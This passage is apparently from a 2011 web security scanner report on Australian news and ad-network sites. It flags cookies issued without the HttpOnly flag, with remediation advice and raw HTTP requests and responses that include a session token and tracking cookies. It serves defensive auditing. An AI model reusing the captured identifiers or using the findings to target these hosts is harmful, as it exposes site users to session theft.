http://cm.au.thewest.overture.com/js_flat_1_0/
http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/130511/0/vj
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/vj
http://i.w55c.net/a.gif
http://i.w55c.net/m.gif
http://i.w55c.net/m_yahoo.gif
http://i.w55c.net/ping_match.gif
http://image2.pubmatic.com/AdServer/Pug
http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js
http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js
http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js
http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js
http://optimized-by.rubiconproject.com/a/7725/12338/22678-15.js
http://optimized-by.rubiconproject.com/a/7725/12338/22678-2.js
http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js
http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js
http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js
http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html
http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html
http://optimized-by.rubiconproject.com/a/dk.js
http://optimized-by.rubiconproject.com/a/dk.js
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pluck.abc.net.au/ver1.0/daapi2.api
http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=36271028/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252Fbusiness%252Fbusiness-old%252Ffraud-blackmail-in-latest-oswal-claims%252Fstory-e6frg2qu-1226131700884
http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=36912405/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F
http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=5306309/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F
http://r1-ads.ace.advertising.com/site=799695/size=300250/u=2/bnum=27560796/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=
http://r1-ads.ace.advertising.com/site=799696/size=728090/u=2/bnum=35855233/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.watoday.com.au%252F
http://r1-ads.ace.advertising.com/site=799696/size=728090/u=2/bnum=85535532/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fnews.smh.com.au%252Fbreaking-news-national%252Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
http://r1-ads.ace.advertising.com/site=801645/size=728090/u=2/bnum=18256183/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F
http://r1-ads.ace.advertising.com/site=801647/size=300250/u=2/bnum=35058392/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F
http://rc.d.chango.com/m/rc
http://rp.gwallet.com/r1/ruum
http://statse.webtrendslive.com/dcsfoa7no000004nwf1r8lgm7_4i7i/dcs.gif
http://statse.webtrendslive.com/dcsw4t3cy00000ctu0wdzjrq1_3q8k/dcs.gif
http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/
http://tap.rubiconproject.com/oz/feeds/targus/profile
http://user.lucidmedia.com/clicksense/user
http://web.adblade.com/imps.php
http://www.abc.net.au/includes/scripts/global.js
http://www.abc.net.au/local/global_css/common_modules/house_ads_m12.css
http://www.abc.net.au/local/global_css/common_modules/latest_media_m21.css
http://www.abc.net.au/local/global_css/common_modules/m60_login.css
http://www.abc.net.au/local/global_css/common_modules/river_of_content_m20.css
http://www.abc.net.au/local/global_css/common_modules/site_search_m3.css
http://www.abc.net.au/local/global_css/common_modules/top_stories_m14.css
http://www.abc.net.au/local/global_css/news/styles.css
http://www.abc.net.au/local/global_css/palettes/generic.css
http://www.abc.net.au/local/global_css/palettes/paletteA.css
http://www.abc.net.au/local/global_css/styles.css
http://www.abc.net.au/local/global_css/template/styles.css
http://www.abc.net.au/local/global_css/yaml/central_draft.css
http://www.abc.net.au/local/global_css/yaml/core/slim_base.css
http://www.abc.net.au/local/global_scripts/contribute/functions.js
http://www.abc.net.au/local/global_scripts/general.min.js
http://www.abc.net.au/local/includes/scripts/city_include.js
http://www.abc.net.au/local/includes/scripts/jquery/plugins/jquery.tools.min.js
http://www.abc.net.au/local/includes/scripts/tabs_latest_media.js
http://www.abc.net.au/res/abc/styles/screen.css
http://www.abc.net.au/res/libraries/abcjs/abc.js
http://www.abc.net.au/res/libraries/jquery/jquery-latest.min.js
http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js
http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx
http://www.investsmart.com.au/promostrip/images/Norm_house120.jpg
http://www.wtp101.com/pull_sync

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

9.1. http://www.6pr.com.au/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.6pr.com.au
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=025261CC856216054C9D51780EE917A3; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.6pr.com.au
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=perth+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

9.2. http://a.triggit.com/pxrucm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.triggit.com
Path:	/pxrucm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

trgu=f0be7f74-7052-4a09-8aa0-ca59d82b3888; domain=.triggit.com; path=/; expires=Wed, 07-Sep-2016 00:00:00 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.3. http://ad.agkn.com/iframe!t=1131! previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.agkn.com
Path:	/iframe!t=1131!

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.4. http://ad.yabuka.com/statsin/adframe/693/300x250 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yabuka.com
Path:	/statsin/adframe/693/300x250

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

client_id=laFpD31Wk2; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /statsin/adframe/693/300x250 HTTP/1.1
Host: ad.yabuka.com
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tc="cDF77OkBNtpIeBFOSP/PqGtaKOk=?_expires=STEzMTU1MTEwODAKLg==&client_id=UydsYUZwRDMxV2syJwpwMQou"

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 07 Sep 2011 14:14:37 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
Set-Cookie: client_id=laFpD31Wk2; Path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2191

(function(c){var d=typeof ybk_url_prefix=="undefined"?"":ybk_url_prefix,e=typeof ybk_url_suffix=="undefined"?"":"/"+ybk_url_suffix;document.write('<style type="text/css">.yabuka_300x250{width:298px;he
...[SNIP]...

9.5. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ih="b!!!!$!.fA@!!!!#=3rw7!0,R>!!!!#=3rw6"; path=/; expires=Fri, 06-Sep-2013 14:15:40 GMT
vuday1=Ajz6%N0FYb/Ve)m; path=/; expires=Thu, 08-Sep-2011 00:00:00 GMT
pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!!!!%!?5%!%5XA1![:Z-!#gyo!(_lN~~~~~~=3rw7~~!#%s?!!E)$!%'Aq!2rc<!%vj1!!H<)!?5%!%5XA1!d1ny!#QKc!(3_Q~~~~~~=3rvk=6$@p!!!NB!#%sB!!E)$!%'Aq!2rc<!%vj1!!H<)!?5%!%5XA1!d1ny!#QKc!(3_Q~~~~~~=3rvk=6$@p!!.vL!#,Uv!!E)$!%'Aq!2rc<!%vj1!!H<)!?5%!%5XA1!d1ny!#QKc!(3_Q~~~~~~=3rvk=6$@p!!.vL"; path=/; expires=Fri, 06-Sep-2013 14:15:40 GMT
BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
liday1=<9:^PN0FYb2Y=?5; path=/; expires=Thu, 08-Sep-2011 00:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?WaUDAJdVGQBlSG4AAAAAACayKAAAAAAAAwAAAAYAAAAAAP8AAAAECs3BEAAAAAAASFc1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADiGAUAAAAAAAIAAgAAAAAAAAAAAAAAAAB-LAKFeBhzPwAAAAAAAAAAfiwChXgYgz8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3KSeJ3GCwChDKG1dFwfrlZYQld3J6roMfB2J5AAAAAA==,,http%3A%2F%2Fau.news.yahoo.com%2Fthewest%2Fa%2F-%2Fwa%2F10210782%2Fwildcats-abandon-bogut-for-nevill%2F,B%3D10%26S%3D14494094%26Z%3D728x90%26_salt%3D1640159214%26cb%3D1315404889357362%26i%3D334050%26r%3D0%26ycg%3D%26ypos%3DN%26yprop%3Dau%255fnews%26yrc%3D%26yyob%3D,c14ae4d4-d95b-11e0-acb6-78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=728x90&site=334050&section_code=14494094&cb=1315404889357362&yrc=&ycg=&yyob=&yprop=au_news&ypos=N
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; liday1=pR#?yN0FYbx1Nl=; ih="b!!!!3!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; bh="b!!!#L!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!#=3r#'!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; vuday1=%)0sI!!w[/N0FYbn[@`@; pv1="b!!!!(!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~"; lifb=GX*)@lPy7G0EA2)A9.-B!6-Nb'W00AM5JknRO1[uD%T4O; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

9.6. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ih="b!!!!7!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!#=3rv_!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!%=3rvx!4cvD!!!!#=3r-A"; path=/; expires=Fri, 06-Sep-2013 14:15:18 GMT
bh="b!!!#L!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!#=3r#'!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!'=3rvx!$?i5!!!!%=3`c_"; path=/; expires=Fri, 06-Sep-2013 14:15:18 GMT
vuday1=Ajz6(%)0sK!!w[/N0FYbx/X^4; path=/; expires=Thu, 08-Sep-2011 00:00:00 GMT
pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvx=43os!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!!!!%!?5%!%5XA1![:Z-!#gyo!(_lN~~~~~~=3rv_~~!#%s?!!E)$!%'Aq!2rc<!%vj1!!H<)!?5%!%5XA1!d1ny!#QKc!(3_Q~~~~~~=3rvk=6$@p!!!NB!#%sB!!E)$!%'Aq!2rc<!%vj1!!H<)!?5%!%5XA1!d1ny!#QKc!(3_Q~~~~~~=3rvk=6$@p!!.vL!#,Uv!!E)$!%'Aq!2rc<!%vj1!!H<)!?5%!%5XA1!d1ny!#QKc!(3_Q~~~~~~=3rvk=6$@p!!.vL"; path=/; expires=Fri, 06-Sep-2013 14:15:18 GMT
BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
lifb=GX*)@lPy7G0EA2)A9.-B!6-Nb'W00AM5Jkn_b<_ENa#9i; path=/; expires=Tue, 13-Sep-2011 12:48:14 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#L!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!